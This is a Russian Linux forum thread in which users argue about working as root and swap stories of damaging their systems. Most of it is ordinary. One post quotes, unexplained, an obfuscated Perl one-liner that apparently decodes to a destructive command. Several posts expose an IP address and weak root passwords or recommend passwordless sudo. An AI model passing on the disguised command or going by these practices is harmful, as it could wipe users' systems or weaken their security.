Кто (не)сидит под рутом? Причины?

А зачем под ним сидеть?

не сидел и не сижу под рутом. ибо нефиг.

для отдельных команд есть sudo, если уж приспичит - то sudo su -

в sudoers wheel с nopasswd.

а почему не сидеть?

не сижу. и другим не советую. почему ? как досидишься - узнаешь. правило "не работай под рутом" по-твоему дураки писАли ? а обьяснять здесь не буду - захочешь - сам найдешь почему этого делать не следует.

> в sudoers wheel с nopasswd.

нафига? лучше вписать что нибудь типа

gz_buza ALL=(ALL) ALL

и если так сильно хочется, то и NOPASSWORD ;)

у меня так и стоит, только для группы, а не для юзера :)

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

(c) 2003 anonymous

получить права wheel намного легче, чем доступ от обычного юзверя ;)

почему?

да и вообще, у меня пасс на рута и на юзера одинаковый.

из 23 знаков :)

L#YH$mft2DSLq35GHI&<br>

вот примерно так он выклядит, я в нем пару символов изменил :))

подберешь? :)))

да зачем подбирать

где то видел сплоит, правда непомню для чего ;) так с его помощью можно получить права wheel

зы: а вообще у меня дома пасс на рута простой - paradise ;) зачем гнуть пальцы и генерить длинные пассворды, если все равно взломают? :)

ага... еще игрулина была такая, paradise cracked называлась :))))

или по-русски "Код доступа: РАЙ" :))

а взломают или нет это спорный вопрос, достаточно не поставить restricted в лило и все... можно заказывать венки :))

а вообще мы когда ставили веб-сервак у нас все по уму сделано было - gcc на 750, для одной группы только....

если щас на меня польются фекальные воды, заранее говорю - это был еще и шелл-серв для своих :)

Осталось тебе добавить PermitRootLogin yes в /etc/ssh/sshd_config, запустить sshd и сообщить мне свой IP (если он динамический, и у тебя есть домен и тулза с no-ip, говори лучше домен). :)

гцц на вебсерваке? ужоснах! :)

не сидят под рутом как раз для того чтоб ты ты написав rm -rf / не остался без корневого каталога.или открыв конфиг в ООо(!) засрал его

213.156.222.122

правда у меня фаерволл фильтрует все входящие соединения ;) на ссх можно только с 192.168.1.*

>а вообще мы когда ставили веб-сервак у нас все по уму сделано было - gcc на 750, для одной группы только....

>если щас на меня польются фекальные воды, заранее говорю - это был еще и шелл-серв для своих :)

А что, scp gcc-bin.tar.bz2 server.com: отменили?

>правда у меня фаерволл фильтрует все входящие соединения

Какая гадость. А я ssh использую в основном не из дома.

владельца выделенки заметно сразу ;)

artem@ubuntu:~$ host 213.156.222.122
122.222.156.213.in-addr.arpa domain name pointer usr1-222-122.dial-up.kraft-s.ru.

А no-ip.com чем не устраивает?

ты непонял ;) у меня диалап

а это означает занятный телефон и ооочень узкий канал

и вообще рулит dyndns.org :)

>а это означает занятный телефон и ооочень узкий канал

Тебе же не иксы пускать. Позвонил домой когда надо и попросил включить дозвон.

> Тебе же не иксы пускать.

это тебе так кажется, mc даже на 128 тормозит

> Позвонил домой когда надо и попросил включить дозвон.

оригинально :) наверное так и сделаю

позвоню из универа домой и скажу, "мам открой консоль и набери sudo wvdial" ;) только перед этим придется ей обьяснить что такое консоль и куда набирать

>это тебе так кажется, mc даже на 128 тормозит

Ну так в шелле работай. Ну и scp home:important_file local_file тоже рулит.

>позвоню из универа домой и скажу, "мам открой консоль и набери sudo wvdial" ;) только перед этим придется ей обьяснить что такое консоль и куда набирать

Иконку на десктоп/панель повесь. Или поставь на клавишу типа WakeUp.

> Ну так в шелле работай.

дык все равно очень медленно

> Ну и scp home:important_file local_file тоже рулит.

рулит флешка с passwd.txt внутри :) это единственное что мне постоянно нужно

> Иконку на десктоп/панель повесь. Или поставь на клавишу типа WakeUp.

тоже вариант ;)

А под рутом не сижу. Под юзером в wheel. На рута пароль из 8 символов - цифры, большие и маленькие буквы. А юзер без пароля. Ещё ftp крутится в локалку, ntpd...ничё, нормал, короче...
А когда был маленький, сидел под рутом и частенько гробил себе систему...

А у меня один и тот же восьмизначный (большие и маленькие буквы, цифры и знаки) пароль на BIOS, GRUB, root, mikhail, guest (логин для того, чтобы я мог залогинить гостей либо для тестирования чего-либо не на своём логине). sudo с рутовым паролем.

Не первый год сижу под рутом. Не разу систему неугробил. Не понимаю почему все так враждебно к этому относятся.

> пароль на BIOS, GRUB

параноик? ;)

Первая лекция на intuit.ru :)

"В Linux есть только один пользователь, полномочия которого в системе принципиально отличаются от полномочий остальных пользователей - это пользователь с идентификатором "0". Обычно учетная запись пользователя с UID=0 называется root (англ., "корень"). Пользователь root - это "администратор" системы Linux, учетная запись для root обязательно присутствует в любой системе Linux, даже если в ней нет никаких других учетных записей. Пользователю с таким UID разрешено выполнять любые действия в системе, а значит, любая ошибка или неправильное действие может повредить систему, уничтожить данные и привести к другим печальным последствиям. Поэтому категорически не рекомендуется регистрироваться в системе под именем root для повседневной работы. Работать в root следует только тогда, когда это действительно необходимо: при настройке и обновлении системы или восстановлении после сбоев."

I am totally agreed with this statement.

все когда-то в первый раз бывает... угробишь когда-нибудь боевой сервак - вспомнишь здешние советы, да поздно будет.

Ну вот честно. Не представляю как можно нечяйно угробить систему. Вариант с "rm -rf /", уж извините, звучит глупо.

>> пароль на BIOS, GRUB

>параноик? ;)

Если кому будет надо - разберут корпус и сбросят биос. А в настройку BIOS'а и GRUB'а я никогда практически не вхожу - мне он не мешает, а от всяких шаловливых ручонок гостей может спасти.

Скрипты тебя спрашивать не будут, ананимус.

Качанием чего попало и откуда попало не занимаюсь, Selecter.

Ты чем занимаешься в системе? Вот я когда сидел под рутом, это было время великих исследований. :) Чё-то копал, чё-то компилил, чё-то правил... Вот так нечаянно в команде перепутаешь опции, и что-нибудь испортишь. Или подправишь что-то, скажашь, "вот ща я это сделаю, потом лило запущу и исправлю". Потом на автомате запускаешь лило и пишешь "reboot". И тут соображаешь, что забыль.... Потому что привык, что никто тебе не говорит "Operation not permitted".
Вот так.

так вы че, не из под рута же дотфайлы не видны: http://www.linux.org.ru/jump-message.jsp?msgid=1007724

в биосе вэйк ап он модем ринг + несложный скрипт... но вобщето если к маме ктото звонить домой будет то она наверное удивится почему комп включается когда соседка звонит:)

я тоже был в недоумении с этой фишкой: включил, забыл, не юзал. и тут набираю хальт и сразу иду пить чай. домой звонит друг поговорили, зашел в комнату, смотрю лялих загружен!!! я подумал что у меня склероз или шизофрения так повторялось несколько раз и только позже я понял в чем дело

кстати если комп выкл и выключить мамед то он (комп) сразу начинал включаться

> но вобщето если к маме ктото звонить домой будет то она наверное удивится почему комп включается когда соседка звонит:)

дык я компутир только на ночь выключаю ;) даже утром, перед тем как поехать в институт, я его включаю заранее

вообще это моя мечта, рулить домашний компутиром удаленно ;) осенью куплю ноут и примерно в тоже время у нас включат кабельный инет, внешний ипишник не проблема да и домен у меня уже есть :)

буду как крутой uberhacker рулить домашний серваком через вайфай с ноута в институте ;)

Вот как раз примерно этим и занимаюсь, поэтому постоянно писать sudo надоедает. Интересная конечно история :) Только у меня такого пока не бывало. Мож просто я очень осторожен.

> постоянно писать sudo надоедает

я в screen'e обычно одно-два окна открываю на которых захожу (rsh) рутом.

>cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Мишган, а есть под рукой ссылочка на топик?

Кстати про "rm -rf /" - ведь поди все не задумываясь делают make install от рута. Ну и? В Makefile можно и эту команду записать, и ещё много чего и весь этот гимор с прыганием с юзера на рут не спасёт. Так что сидеть/не сидеть под рутом это уже дело вкуса, а не безопасности. Если конечно человек линукс не первый день юзает.

Я не сижу. Потому что уже терял /home целиком.

http://www.linux.org.ru/jump-message.jsp?msgid=392747.

>Кстати про "rm -rf /" - ведь поди все не задумываясь делают make install от рута. Ну и? В Makefile можно и эту команду записать, и ещё много чего и весь этот гимор с прыганием с юзера на рут не спасёт.

Автору такого софта всего лишь яйца оторвут.

Давно ещё логинился как рут, а потом просто решил узнать, что ж такое
 означает логиниться как пользователь.

Но обычно у меня всё равно запущен один сеанс в Konsole с рутовым МС.
Сейчас уже стал пользоваться sudo.

А курьёз был вот какой. Как-то создал папку /Oracle. Захотел добавить на
 неё права пользователя. Надо было писать так:

chown -R roman. /Oracle

А я по привычке написал:

chown -R roman. *

будучи в корне .....
Через несколько секунд опомнился ... потом пришлось восстанавливать права на всякие системные и другие директории.

Но раньше ничего не случалось, когда сидел под рутом. Просто вот так вот 
на автомате можно лишку набрать в команде, а потом будет поздно ... :)

Ekonomist, расскажи как же ты его потерял?

>Ekonomist, расскажи как же ты его потерял?

Дык, по глупости.